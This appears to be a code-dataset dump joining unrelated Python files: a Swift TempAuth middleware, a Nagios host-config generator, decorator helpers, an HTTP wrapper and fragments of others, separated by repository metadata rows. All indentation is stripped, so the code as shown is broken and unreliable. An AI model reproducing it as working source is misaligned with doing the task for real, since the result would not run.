@staticmethod
def _measure(d, inputs, output):
"""
Compute I_wedge(inputs : output) = I(meet(inputs) : output)
Parameters
----------
d : Distribution
The distribution to compute i_wedge for.
inputs : iterable of iterables
The input variables.
output : iterable
The output variable.
Returns
-------
iwedge : float
The value of I_wedge.
"""
d = d.coalesce(inputs+(output,))
d = Distribution(d.outcomes, d.pmf, sample_space=d.outcomes)
d = insert_meet(d, -1, d.rvs[:-1])
return coinformation(d, [d.rvs[-2], d.rvs[-1]])
| bsd-3-clause | 7,420,420,584,193,200,000 | 24.227273 | 69 | 0.587387 | false |
pvo/swift | swift/common/middleware/tempauth.py | 1 | 21275 | # Copyright (c) 2011 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from time import gmtime, strftime, time
from traceback import format_exc
from urllib import quote, unquote
from uuid import uuid4
from hashlib import sha1
import hmac
import base64
from eventlet import Timeout
from webob import Response, Request
from webob.exc import HTTPBadRequest, HTTPForbidden, HTTPNotFound, \
HTTPUnauthorized
from swift.common.middleware.acl import clean_acl, parse_acl, referrer_allowed
from swift.common.utils import cache_from_env, get_logger, get_remote_client, \
split_path, TRUE_VALUES
class TempAuth(object):
"""
Test authentication and authorization system.
Add to your pipeline in proxy-server.conf, such as::
[pipeline:main]
pipeline = catch_errors cache tempauth proxy-server
Set account auto creation to true in proxy-server.conf::
[app:proxy-server]
account_autocreate = true
And add a tempauth filter section, such as::
[filter:tempauth]
use = egg:swift#tempauth
user_admin_admin = admin .admin .reseller_admin
user_test_tester = testing .admin
user_test2_tester2 = testing2 .admin
user_test_tester3 = testing3
See the proxy-server.conf-sample for more information.
:param app: The next WSGI app in the pipeline
:param conf: The dict of configuration values
"""
def __init__(self, app, conf):
self.app = app
self.conf = conf
self.logger = get_logger(conf, log_route='tempauth')
self.log_headers = conf.get('log_headers') == 'True'
self.reseller_prefix = conf.get('reseller_prefix', 'AUTH').strip()
if self.reseller_prefix and self.reseller_prefix[-1] != '_':
self.reseller_prefix += '_'
self.auth_prefix = conf.get('auth_prefix', '/auth/')
if not self.auth_prefix:
self.auth_prefix = '/auth/'
if self.auth_prefix[0] != '/':
self.auth_prefix = '/' + self.auth_prefix
if self.auth_prefix[-1] != '/':
self.auth_prefix += '/'
self.token_life = int(conf.get('token_life', 86400))
self.allowed_sync_hosts = [h.strip()
for h in conf.get('allowed_sync_hosts', '127.0.0.1').split(',')
if h.strip()]
self.allow_overrides = \
conf.get('allow_overrides', 't').lower() in TRUE_VALUES
self.users = {}
for conf_key in conf:
if conf_key.startswith('user_'):
values = conf[conf_key].split()
if not values:
raise ValueError('%s has no key set' % conf_key)
key = values.pop(0)
if values and '://' in values[-1]:
url = values.pop()
else:
url = 'https://' if 'cert_file' in conf else 'http://'
ip = conf.get('bind_ip', '127.0.0.1')
if ip == '0.0.0.0':
ip = '127.0.0.1'
url += ip
url += ':' + conf.get('bind_port', '8080') + '/v1/' + \
self.reseller_prefix + conf_key.split('_')[1]
self.users[conf_key.split('_', 1)[1].replace('_', ':')] = {
'key': key, 'url': url, 'groups': values}
def __call__(self, env, start_response):
"""
Accepts a standard WSGI application call, authenticating the request
and installing callback hooks for authorization and ACL header
validation. For an authenticated request, REMOTE_USER will be set to a
comma separated list of the user's groups.
With a non-empty reseller prefix, acts as the definitive auth service
for just tokens and accounts that begin with that prefix, but will deny
requests outside this prefix if no other auth middleware overrides it.
With an empty reseller prefix, acts as the definitive auth service only
for tokens that validate to a non-empty set of groups. For all other
requests, acts as the fallback auth service when no other auth
middleware overrides it.
Alternatively, if the request matches the self.auth_prefix, the request
will be routed through the internal auth request handler (self.handle).
This is to handle granting tokens, etc.
"""
if self.allow_overrides and env.get('swift.authorize_override', False):
return self.app(env, start_response)
if env.get('PATH_INFO', '').startswith(self.auth_prefix):
return self.handle(env, start_response)
s3 = env.get('HTTP_AUTHORIZATION')
token = env.get('HTTP_X_AUTH_TOKEN', env.get('HTTP_X_STORAGE_TOKEN'))
if s3 or (token and token.startswith(self.reseller_prefix)):
# Note: Empty reseller_prefix will match all tokens.
groups = self.get_groups(env, token)
if groups:
env['REMOTE_USER'] = groups
user = groups and groups.split(',', 1)[0] or ''
# We know the proxy logs the token, so we augment it just a bit
# to also log the authenticated user.
env['HTTP_X_AUTH_TOKEN'] = \
'%s,%s' % (user, 's3' if s3 else token)
env['swift.authorize'] = self.authorize
env['swift.clean_acl'] = clean_acl
else:
# Unauthorized token
if self.reseller_prefix:
# Because I know I'm the definitive auth for this token, I
# can deny it outright.
return HTTPUnauthorized()(env, start_response)
# Because I'm not certain if I'm the definitive auth for empty
# reseller_prefixed tokens, I won't overwrite swift.authorize.
elif 'swift.authorize' not in env:
env['swift.authorize'] = self.denied_response
else:
if self.reseller_prefix:
# With a non-empty reseller_prefix, I would like to be called
# back for anonymous access to accounts I know I'm the
# definitive auth for.
try:
version, rest = split_path(env.get('PATH_INFO', ''),
1, 2, True)
except ValueError:
version, rest = None, None
if rest and rest.startswith(self.reseller_prefix):
# Handle anonymous access to accounts I'm the definitive
# auth for.
env['swift.authorize'] = self.authorize
env['swift.clean_acl'] = clean_acl
# Not my token, not my account, I can't authorize this request,
# deny all is a good idea if not already set...
elif 'swift.authorize' not in env:
env['swift.authorize'] = self.denied_response
# Because I'm not certain if I'm the definitive auth for empty
# reseller_prefixed accounts, I won't overwrite swift.authorize.
elif 'swift.authorize' not in env:
env['swift.authorize'] = self.authorize
env['swift.clean_acl'] = clean_acl
return self.app(env, start_response)
def get_groups(self, env, token):
"""
Get groups for the given token.
:param env: The current WSGI environment dictionary.
:param token: Token to validate and return a group string for.
:returns: None if the token is invalid or a string containing a comma
separated list of groups the authenticated user is a member
of. The first group in the list is also considered a unique
identifier for that user.
"""
groups = None
memcache_client = cache_from_env(env)
if not memcache_client:
raise Exception('Memcache required')
memcache_token_key = '%s/token/%s' % (self.reseller_prefix, token)
cached_auth_data = memcache_client.get(memcache_token_key)
if cached_auth_data:
expires, groups = cached_auth_data
if expires < time():
groups = None
if env.get('HTTP_AUTHORIZATION'):
account_user, sign = \
env['HTTP_AUTHORIZATION'].split(' ')[1].rsplit(':', 1)
if account_user not in self.users:
return None
account, user = account_user.split(':', 1)
account_id = self.users[account_user]['url'].rsplit('/', 1)[-1]
path = env['PATH_INFO']
env['PATH_INFO'] = path.replace(account_user, account_id, 1)
msg = base64.urlsafe_b64decode(unquote(token))
key = self.users[account_user]['key']
s = base64.encodestring(hmac.new(key, msg, sha1).digest()).strip()
if s != sign:
return None
groups = [account, account_user]
groups.extend(self.users[account_user]['groups'])
if '.admin' in groups:
groups.remove('.admin')
groups.append(account_id)
groups = ','.join(groups)
return groups
def authorize(self, req):
"""
Returns None if the request is authorized to continue or a standard
WSGI response callable if not.
"""
try:
version, account, container, obj = split_path(req.path, 1, 4, True)
except ValueError:
return HTTPNotFound(request=req)
if not account or not account.startswith(self.reseller_prefix):
return self.denied_response(req)
user_groups = (req.remote_user or '').split(',')
if '.reseller_admin' in user_groups and \
account != self.reseller_prefix and \
account[len(self.reseller_prefix)] != '.':
req.environ['swift_owner'] = True
return None
if account in user_groups and \
(req.method not in ('DELETE', 'PUT') or container):
# If the user is admin for the account and is not trying to do an
# account DELETE or PUT...
req.environ['swift_owner'] = True
return None
if (req.environ.get('swift_sync_key') and
req.environ['swift_sync_key'] ==
req.headers.get('x-container-sync-key', None) and
'x-timestamp' in req.headers and
(req.remote_addr in self.allowed_sync_hosts or
get_remote_client(req) in self.allowed_sync_hosts)):
return None
referrers, groups = parse_acl(getattr(req, 'acl', None))
if referrer_allowed(req.referer, referrers):
if obj or '.rlistings' in groups:
return None
return self.denied_response(req)
if not req.remote_user:
return self.denied_response(req)
for user_group in user_groups:
if user_group in groups:
return None
return self.denied_response(req)
def denied_response(self, req):
"""
Returns a standard WSGI response callable with the status of 403 or 401
depending on whether the REMOTE_USER is set or not.
"""
if req.remote_user:
return HTTPForbidden(request=req)
else:
return HTTPUnauthorized(request=req)
def handle(self, env, start_response):
"""
WSGI entry point for auth requests (ones that match the
self.auth_prefix).
Wraps env in webob.Request object and passes it down.
:param env: WSGI environment dictionary
:param start_response: WSGI callable
"""
try:
req = Request(env)
if self.auth_prefix:
req.path_info_pop()
req.bytes_transferred = '-'
req.client_disconnect = False
if 'x-storage-token' in req.headers and \
'x-auth-token' not in req.headers:
req.headers['x-auth-token'] = req.headers['x-storage-token']
if 'eventlet.posthooks' in env:
env['eventlet.posthooks'].append(
(self.posthooklogger, (req,), {}))
return self.handle_request(req)(env, start_response)
else:
# Lack of posthook support means that we have to log on the
# start of the response, rather than after all the data has
# been sent. This prevents logging client disconnects
# differently than full transmissions.
response = self.handle_request(req)(env, start_response)
self.posthooklogger(env, req)
return response
except (Exception, Timeout):
print "EXCEPTION IN handle: %s: %s" % (format_exc(), env)
start_response('500 Server Error',
[('Content-Type', 'text/plain')])
return ['Internal server error.\n']
def handle_request(self, req):
"""
Entry point for auth requests (ones that match the self.auth_prefix).
Should return a WSGI-style callable (such as webob.Response).
:param req: webob.Request object
"""
req.start_time = time()
handler = None
try:
version, account, user, _junk = split_path(req.path_info,
minsegs=1, maxsegs=4, rest_with_last=True)
except ValueError:
return HTTPNotFound(request=req)
if version in ('v1', 'v1.0', 'auth'):
if req.method == 'GET':
handler = self.handle_get_token
if not handler:
req.response = HTTPBadRequest(request=req)
else:
req.response = handler(req)
return req.response
def handle_get_token(self, req):
"""
Handles the various `request for token and service end point(s)` calls.
There are various formats to support the various auth servers in the
past. Examples::
GET <auth-prefix>/v1/<act>/auth
X-Auth-User: <act>:<usr> or X-Storage-User: <usr>
X-Auth-Key: <key> or X-Storage-Pass: <key>
GET <auth-prefix>/auth
X-Auth-User: <act>:<usr> or X-Storage-User: <act>:<usr>
X-Auth-Key: <key> or X-Storage-Pass: <key>
GET <auth-prefix>/v1.0
X-Auth-User: <act>:<usr> or X-Storage-User: <act>:<usr>
X-Auth-Key: <key> or X-Storage-Pass: <key>
On successful authentication, the response will have X-Auth-Token and
X-Storage-Token set to the token to use with Swift and X-Storage-URL
set to the URL to the default Swift cluster to use.
:param req: The webob.Request to process.
:returns: webob.Response, 2xx on success with data set as explained
above.
"""
# Validate the request info
try:
pathsegs = split_path(req.path_info, minsegs=1, maxsegs=3,
rest_with_last=True)
except ValueError:
return HTTPNotFound(request=req)
if pathsegs[0] == 'v1' and pathsegs[2] == 'auth':
account = pathsegs[1]
user = req.headers.get('x-storage-user')
if not user:
user = req.headers.get('x-auth-user')
if not user or ':' not in user:
return HTTPUnauthorized(request=req)
account2, user = user.split(':', 1)
if account != account2:
return HTTPUnauthorized(request=req)
key = req.headers.get('x-storage-pass')
if not key:
key = req.headers.get('x-auth-key')
elif pathsegs[0] in ('auth', 'v1.0'):
user = req.headers.get('x-auth-user')
if not user:
user = req.headers.get('x-storage-user')
if not user or ':' not in user:
return HTTPUnauthorized(request=req)
account, user = user.split(':', 1)
key = req.headers.get('x-auth-key')
if not key:
key = req.headers.get('x-storage-pass')
else:
return HTTPBadRequest(request=req)
if not all((account, user, key)):
return HTTPUnauthorized(request=req)
# Authenticate user
account_user = account + ':' + user
if account_user not in self.users:
return HTTPUnauthorized(request=req)
if self.users[account_user]['key'] != key:
return HTTPUnauthorized(request=req)
# Get memcache client
memcache_client = cache_from_env(req.environ)
if not memcache_client:
raise Exception('Memcache required')
# See if a token already exists and hasn't expired
token = None
memcache_user_key = '%s/user/%s' % (self.reseller_prefix, account_user)
candidate_token = memcache_client.get(memcache_user_key)
if candidate_token:
memcache_token_key = \
'%s/token/%s' % (self.reseller_prefix, candidate_token)
cached_auth_data = memcache_client.get(memcache_token_key)
if cached_auth_data:
expires, groups = cached_auth_data
if expires > time():
token = candidate_token
# Create a new token if one didn't exist
if not token:
# Generate new token
token = '%stk%s' % (self.reseller_prefix, uuid4().hex)
expires = time() + self.token_life
groups = [account, account_user]
groups.extend(self.users[account_user]['groups'])
if '.admin' in groups:
groups.remove('.admin')
account_id = self.users[account_user]['url'].rsplit('/', 1)[-1]
groups.append(account_id)
groups = ','.join(groups)
# Save token
memcache_token_key = '%s/token/%s' % (self.reseller_prefix, token)
memcache_client.set(memcache_token_key, (expires, groups),
timeout=float(expires - time()))
# Record the token with the user info for future use.
memcache_user_key = \
'%s/user/%s' % (self.reseller_prefix, account_user)
memcache_client.set(memcache_user_key, token,
timeout=float(expires - time()))
return Response(request=req,
headers={'x-auth-token': token, 'x-storage-token': token,
'x-storage-url': self.users[account_user]['url']})
def posthooklogger(self, env, req):
if not req.path.startswith(self.auth_prefix):
return
response = getattr(req, 'response', None)
if not response:
return
trans_time = '%.4f' % (time() - req.start_time)
the_request = quote(unquote(req.path))
if req.query_string:
the_request = the_request + '?' + req.query_string
# remote user for zeus
client = req.headers.get('x-cluster-client-ip')
if not client and 'x-forwarded-for' in req.headers:
# remote user for other lbs
client = req.headers['x-forwarded-for'].split(',')[0].strip()
logged_headers = None
if self.log_headers:
logged_headers = '\n'.join('%s: %s' % (k, v)
for k, v in req.headers.items())
status_int = response.status_int
if getattr(req, 'client_disconnect', False) or \
getattr(response, 'client_disconnect', False):
status_int = 499
self.logger.info(' '.join(quote(str(x)) for x in (client or '-',
req.remote_addr or '-', strftime('%d/%b/%Y/%H/%M/%S', gmtime()),
req.method, the_request, req.environ['SERVER_PROTOCOL'],
status_int, req.referer or '-', req.user_agent or '-',
req.headers.get('x-auth-token',
req.headers.get('x-auth-admin-user', '-')),
getattr(req, 'bytes_transferred', 0) or '-',
getattr(response, 'bytes_transferred', 0) or '-',
req.headers.get('etag', '-'),
req.environ.get('swift.trans_id', '-'), logged_headers or '-',
trans_time)))
def filter_factory(global_conf, **local_conf):
"""Returns a WSGI filter app for use with paste.deploy."""
conf = global_conf.copy()
conf.update(local_conf)
def auth_filter(app):
return TempAuth(app, conf)
return auth_filter
| apache-2.0 | -6,645,367,474,745,003,000 | 43.139004 | 79 | 0.560188 | false |
CanuxCheng/Nagios-Auto | nrobot/host/host.py | 1 | 9599 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
######################################################################
# Copyright C 2015 Faurecia (China) Holding Co.,Ltd. #
# All rights reserved #
# Name: host.py
# Author: Canux [email protected] #
# Version: V1.0 #
# Time: Thu 20 Aug 2015 02:27:23 AM EDT
######################################################################
# Description:
######################################################################
from base import NagiosAuto
import os
class Host(NagiosAuto):
"""This class have three options to create create host file in nagios.
You can specify the template you need.
If you create a lots of host file at one time, this is more effeciency.
"""
def __init__(self, *args, **kwargs):
"""Define some variables"""
super(Host, self).__init__(*args, **kwargs)
self.g_dir = self.args.path + "/hosts/"
self.host_conf = self.conf + "/host/"
self.area_conf = self.conf + "/area/"
self.area_list = ["as", "us", "eu"]
if self.__class__.__name__ == "Host":
self.logger.debug("==== END DEBUG ====")
def define_options(self):
"""Define some options used for create host."""
super(Host, self).define_options()
self.parser.add_argument("-t", "--types",
action="append",
dest="types",
required=False,
help="The host types, eg: ['ad', 'mii', \
'ijcore', 'mii_win-primary', 'mii_win-bck']. \
Read template from types.cfg and \
read hostname and ip address from types.txt. \
Use types@mode for normal host. \
mode=0 use dns as address. \
mode=1 use ip as address.")
self.parser.add_argument("-v", "--vcenter",
dest="vcenter",
required=False,
help="Vcenter for mii and ijcore vmware.")
def get_area(self, hostname):
"""Get the area us/eu/as according to hostname."""
try:
locate = hostname[0:2].upper()
self.logger.debug("locate: {}".format(locate))
for area in self.area_list:
area_file = self.area_conf + area + ".txt"
self.logger.debug("area_file: {}".format(area_file))
f = open(area_file, "r")
lines = f.readlines()
for line in lines:
if locate in line:
self.logger.debug("area: {}".format(area))
return area
self.not_exist(locate)
except Exception as e:
self.error("get_area: %s" % e)
def get_vcenter(self, vcenter):
"""Get the vcenter for vmware."""
try:
vcenterfile = self.area_conf + "vmware.txt"
self.logger.debug("vcenterfile: {}".format(vcenterfile))
fr = open(vcenterfile, "r")
lines = fr.readlines()
for line in lines:
if vcenter in line:
vcenter = "".join(line.split())
self.logger.debug("vcenter: {}".format(vcenter))
return vcenter
self.not_exist("%s" % vcenter)
except Exception as e:
self.error("get_vcenter: %s" % e)
def get_mii_site(self, hostname):
"""Get the for _MII_SITEDATABASE in mii primary or backup server."""
try:
mii_site = hostname[2:5].upper()
self.logger.debug("mii_site: {}".format(mii_site))
return mii_site
except Exception as e:
self.error("get_mii_site: %s" % e)
def get_types(self, types):
try:
if types in ["ad", "mii_win-primary", "mii_win-bck"]:
types = types
mode = 1
elif types in ["mii", "ijcore"]:
types = types
mode = 0
else:
old_type = types
types = old_type.split("@")[0]
mode = old_type.split("@")[1]
if not mode:
self.error("Please specify address mode for normal host.")
self.logger.debug("types: {}".format(types))
self.logger.debug("mode: {}".format(mode))
return types, mode
except Exception as e:
self.error("get_types: %s" % e)
def write_one_host(self, hostfile, lines, vcenter,
area, mii_site, hostname, address):
"""Write to one host file."""
try:
fw = open(hostfile, "w")
for l in lines:
self.logger.debug("l: {}".format(l))
if "ohtpl_area_%s" in l:
fw.write(l % area)
elif "ohtpl_sys_vmware_%s_%s" in l:
l_vcenter = l.replace("ohtpl_sys_vmware_%s_%s",
str(vcenter))
fw.write(l_vcenter)
elif "host_name" in l:
fw.write(l % hostname)
elif "address" in l:
fw.write(l % address)
elif "_MII_SITEDATABASE" in l:
fw.write(l % mii_site)
elif "%s" not in l:
fw.write(l)
# If %s inside but not specify, can not handle it.
else:
self.error("write_host: unknow argument %s inside.")
except Exception as e:
self.error("write_one_host: %s" % e)
def create_host(self):
"""Get types from -t and read hostname and address and write to the \
hosts in nagios."""
try:
vcenter = ""
area = ""
mii_site = ""
for loop in range(0, len(self.args.types)):
types = self.args.types[loop]
self.logger.debug("types: {}".format(types))
(types, mode) = self.get_types(types)
# Get the template file.
template = self.host_conf + types + ".cfg"
self.logger.debug("template: {}".format(template))
ftr = open(template, "r")
lines = ftr.readlines()
# Get the hostname and address file.
host = self.host_conf + types + ".txt"
self.logger.debug("host: {}".format(host))
des_host = self.host_conf + types + ".tmp"
self.logger.debug("des_host: {}".format(des_host))
self.delete_blank_line(host, des_host)
fhr = open(des_host, "r")
h_lines = fhr.readlines()
for line in h_lines:
hostname = line.split()[0].split(".")[0].strip().upper()
self.logger.debug("hostname: {}".format(hostname))
address = line.split()[int(mode)].strip().lower()
self.logger.debug("address: {}".format(address))
hostfile = self.g_dir + hostname + ".cfg"
self.logger.debug("hostfile: {}".format(hostfile))
if types in ["ad"]:
area = self.get_area(hostname)
elif types in ["mii_win-primary", "mii_win-bck"]:
area = self.get_area(hostname)
mii_site = self.get_mii_site(hostname)
elif types in ["mii", "ijcore"]:
if self.args.vcenter:
vcenter = self.get_vcenter(self.args.vcenter)
else:
self.error("Please use -v to specify vcenter.")
# Write to the host in nagios.
if os.path.isfile(hostfile):
self.already_exist("%s" % hostfile)
if self.args.force:
self.write_one_host(hostfile, lines, vcenter, area,
mii_site, hostname, address)
else:
self.write_one_host(hostfile, lines, vcenter, area,
mii_site, hostname, address)
except Exception as e:
self.error("create_host: %s" % e)
def delete_host(self):
files = self.host_conf + "host.txt"
self.logger.debug("files: {}".format(files))
des_files = self.host_conf + "host.tmp"
self.logger.debug("des_files: {}".format(des_files))
self.delete_blank_line(files, des_files)
self.fr = open(des_files, "r")
self.lines = self.fr.readlines()
for line in self.lines:
self.logger.debug("line: {}".format(line))
hostname = line.split()[0].split(".")[0].strip().upper()
hostfile = self.g_dir + hostname + ".cfg"
self.logger.debug("hostfile: {}".format(hostfile))
if not os.path.isfile(hostfile):
self.not_exist("%s" % hostfile)
else:
try:
os.remove(hostfile)
except Exception as e:
self.error("remove_host: %s" % e)
| bsd-3-clause | -2,004,714,789,927,656,400 | 42.238739 | 79 | 0.449213 | false |
radomd92/botjagwar | api/decorator.py | 1 | 3279 | import datetime
import multiprocessing
import threading
import time
def critical_section(cs_lock: threading.Lock):
"""
Decorator which uses acquires the specified lock when entering in the decorated function
and releases it once out of the decorated function.
:param cs_lock:
:return:
"""
def _critical_section(f):
def _critical_section_wrapper(*args, **kwargs):
cs_lock.acquire()
ret = f(*args, **kwargs)
cs_lock.release()
return ret
return _critical_section_wrapper
return _critical_section
class run_once(object):
"""
Decorator for run-once methods
"""
__slots__ = ("func", "result", "methods")
def __init__(self, func):
self.func = func
def __call__(self, *args, **kw):
try:
return self.result
except AttributeError:
self.result = self.func(*args, **kw)
return self.result
def __get__(self, instance, cls):
method = self.func.__get__(instance, cls)
try:
return self.methods[method]
except (AttributeError,KeyError):
decorated = run_once(method)
try:
self.methods[method] = decorated
except AttributeError:
self.methods = { method : decorated }
return decorated
def __eq__(self, other):
return isinstance(other, run_once) and other.func == self.func
def __hash__(self):
return hash(self.func)
def singleton(class_):
"""
Specify that a class is a singleton
:param class_:
:return:
"""
instances = {}
def getinstance(*args, **kwargs):
if class_ not in instances:
instances[class_] = class_(*args, **kwargs)
return instances[class_]
return getinstance
def threaded(f):
def wrap(*args, **kwargs):
t = threading.Thread(target=f, args=args, kwargs=kwargs)
t.daemon = False
t.start()
return wrap
def separate_process(f):
"""
Function runs in a separate, daemon thread
:param f:
:return:
"""
def wrap(*args, **kwargs):
t = multiprocessing.Process(target=f, args=args, kwargs=kwargs)
t.start()
return wrap
def time_this(identifier='function'):
def _time_this(f):
def wrapper(*args, **kwargs):
t0 = datetime.datetime.now()
ret = f(*args, **kwargs)
t1 = datetime.datetime.now()
dt = t1 - t0
d = dt.seconds * 1000 + dt.microseconds / 1000
print(("%s took %2.6f seconds to execute" % (identifier, d/1000.)))
return ret
return wrapper
return _time_this
def retry_on_fail(exceptions, retries=5, time_between_retries=1):
def _retry_on_fail(f):
def wrapper(*args, **kwargs):
m_retries = 0
try:
return f(*args, **kwargs)
except tuple(exceptions) as e:
if m_retries <= retries:
m_retries += 1
print('Error:', e, '%d' % m_retries)
time.sleep(time_between_retries)
else:
raise e
return wrapper
return _retry_on_fail
| mit | -8,227,460,502,292,809,000 | 24.818898 | 92 | 0.548033 | false |
noba3/KoTos | addons/plugin.video.ntv/net.py | 1 | 10537 | '''
common XBMC Module
Copyright (C) 2011 t0mm0
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import cookielib
import gzip
import re
import StringIO
import urllib
import urllib2
import socket
#Set Global timeout - Useful for slow connections and Putlocker.
socket.setdefaulttimeout(30)
class HeadRequest(urllib2.Request):
'''A Request class that sends HEAD requests'''
def get_method(self):
return 'HEAD'
class Net:
'''
This class wraps :mod:`urllib2` and provides an easy way to make http
requests while taking care of cookies, proxies, gzip compression and
character encoding.
Example::
from t0mm0.common.net import Net
net = Net()
response = net.http_GET('http://xbmc.org')
print response.content
'''
_cj = cookielib.LWPCookieJar()
_proxy = None
import xbmcaddon
PLUGIN='plugin.video.ntv'
ADDON = xbmcaddon.Addon(id=PLUGIN)
streamtype = ADDON.getSetting('streamtype')
if streamtype == '0':
STREAMTYPE = 'NTV-XBMC-HLS-'
elif streamtype == '1':
STREAMTYPE = 'NTV-XBMC-'
_user_agent = STREAMTYPE + ADDON.getAddonInfo('version')
_http_debug = False
def __init__(self, cookie_file='', proxy='', user_agent='',
http_debug=False):
'''
Kwargs:
cookie_file (str): Full path to a file to be used to load and save
cookies to.
proxy (str): Proxy setting (eg.
``'http://user:[email protected]:1234'``)
user_agent (str): String to use as the User Agent header. If not
supplied the class will use a default user agent (chrome)
http_debug (bool): Set ``True`` to have HTTP header info written to
the XBMC log for all requests.
'''
if cookie_file:
self.set_cookies(cookie_file)
if proxy:
self.set_proxy(proxy)
if user_agent:
self.set_user_agent(user_agent)
self._http_debug = http_debug
self._update_opener()
def set_cookies(self, cookie_file):
'''
Set the cookie file and try to load cookies from it if it exists.
Args:
cookie_file (str): Full path to a file to be used to load and save
cookies to.
'''
try:
self._cj.load(cookie_file, ignore_discard=True)
self._update_opener()
return True
except:
return False
def get_cookies(self):
'''Returns A dictionary containing all cookie information by domain.'''
return self._cj._cookies
def save_cookies(self, cookie_file):
'''
Saves cookies to a file.
Args:
cookie_file (str): Full path to a file to save cookies to.
'''
self._cj.save(cookie_file, ignore_discard=True)
def set_proxy(self, proxy):
'''
Args:
proxy (str): Proxy setting (eg.
``'http://user:[email protected]:1234'``)
'''
self._proxy = proxy
self._update_opener()
def get_proxy(self):
'''Returns string containing proxy details.'''
return self._proxy
def set_user_agent(self, user_agent):
'''
Args:
user_agent (str): String to use as the User Agent header.
'''
self._user_agent = user_agent
def get_user_agent(self):
'''Returns user agent string.'''
return self._user_agent
def _update_opener(self):
'''
Builds and installs a new opener to be used by all future calls to
:func:`urllib2.urlopen`.
'''
if self._http_debug:
http = urllib2.HTTPHandler(debuglevel=1)
else:
http = urllib2.HTTPHandler()
if self._proxy:
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self._cj),
urllib2.ProxyHandler({'http':
self._proxy}),
urllib2.HTTPBasicAuthHandler(),
http)
else:
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self._cj),
urllib2.HTTPBasicAuthHandler(),
http)
urllib2.install_opener(opener)
def http_GET(self, url, headers={}, compression=True):
'''
Perform an HTTP GET request.
Args:
url (str): The URL to GET.
Kwargs:
headers (dict): A dictionary describing any headers you would like
to add to the request. (eg. ``{'X-Test': 'testing'}``)
compression (bool): If ``True`` (default), try to use gzip
compression.
Returns:
An :class:`HttpResponse` object containing headers and other
meta-information about the page and the page content.
'''
return self._fetch(url, headers=headers, compression=compression)
def http_POST(self, url, form_data, headers={}, compression=True):
'''
Perform an HTTP POST request.
Args:
url (str): The URL to POST.
form_data (dict): A dictionary of form data to POST.
Kwargs:
headers (dict): A dictionary describing any headers you would like
to add to the request. (eg. ``{'X-Test': 'testing'}``)
compression (bool): If ``True`` (default), try to use gzip
compression.
Returns:
An :class:`HttpResponse` object containing headers and other
meta-information about the page and the page content.
'''
return self._fetch(url, form_data, headers=headers,
compression=compression)
def http_HEAD(self, url, headers={}):
'''
Perform an HTTP HEAD request.
Args:
url (str): The URL to GET.
Kwargs:
headers (dict): A dictionary describing any headers you would like
to add to the request. (eg. ``{'X-Test': 'testing'}``)
Returns:
An :class:`HttpResponse` object containing headers and other
meta-information about the page.
'''
req = HeadRequest(url)
req.add_header('User-Agent', self._user_agent)
for k, v in headers.items():
req.add_header(k, v)
response = urllib2.urlopen(req)
return HttpResponse(response)
def _fetch(self, url, form_data={}, headers={}, compression=True):
'''
Perform an HTTP GET or POST request.
Args:
url (str): The URL to GET or POST.
form_data (dict): A dictionary of form data to POST. If empty, the
request will be a GET, if it contains form data it will be a POST.
Kwargs:
headers (dict): A dictionary describing any headers you would like
to add to the request. (eg. ``{'X-Test': 'testing'}``)
compression (bool): If ``True`` (default), try to use gzip
compression.
Returns:
An :class:`HttpResponse` object containing headers and other
meta-information about the page and the page content.
'''
encoding = ''
req = urllib2.Request(url)
if form_data:
form_data = urllib.urlencode(form_data)
req = urllib2.Request(url, form_data)
req.add_header('User-Agent', self._user_agent)
for k, v in headers.items():
req.add_header(k, v)
if compression:
req.add_header('Accept-Encoding', 'gzip')
response = urllib2.urlopen(req)
return HttpResponse(response)
class HttpResponse:
'''
This class represents a resoponse from an HTTP request.
The content is examined and every attempt is made to properly encode it to
Unicode.
.. seealso::
:meth:`Net.http_GET`, :meth:`Net.http_HEAD` and :meth:`Net.http_POST`
'''
content = ''
'''Unicode encoded string containing the body of the reposne.'''
def __init__(self, response):
'''
Args:
response (:class:`mimetools.Message`): The object returned by a call
to :func:`urllib2.urlopen`.
'''
self._response = response
html = response.read()
try:
if response.headers['content-encoding'].lower() == 'gzip':
html = gzip.GzipFile(fileobj=StringIO.StringIO(html)).read()
except:
pass
try:
content_type = response.headers['content-type']
if 'charset=' in content_type:
encoding = content_type.split('charset=')[-1]
except:
pass
r = re.search('<meta\s+http-equiv="Content-Type"\s+content="(?:.+?);' +
'\s+charset=(.+?)"', html, re.IGNORECASE)
if r:
encoding = r.group(1)
try:
html = unicode(html, encoding)
except:
pass
self.content = html
def get_headers(self):
'''Returns a List of headers returned by the server.'''
return self._response.info().headers
def get_url(self):
'''
Return the URL of the resource retrieved, commonly used to determine if
a redirect was followed.
'''
return self._response.geturl()
| gpl-2.0 | -4,163,256,744,423,435,000 | 30.174556 | 80 | 0.541425 | false |
LegoStormtroopr/canard | SQBLWidgets/sqblUI/logicNodeText.py | 1 | 3374 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui/logicNodeText.ui'
#
# Created: Sat Jul 25 12:16:46 2015
# by: PyQt4 UI code generator 4.9.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(534, 454)
self.verticalLayout = QtGui.QVBoxLayout(Form)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.label = QtGui.QLabel(Form)
self.label.setWordWrap(True)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout.addWidget(self.label)
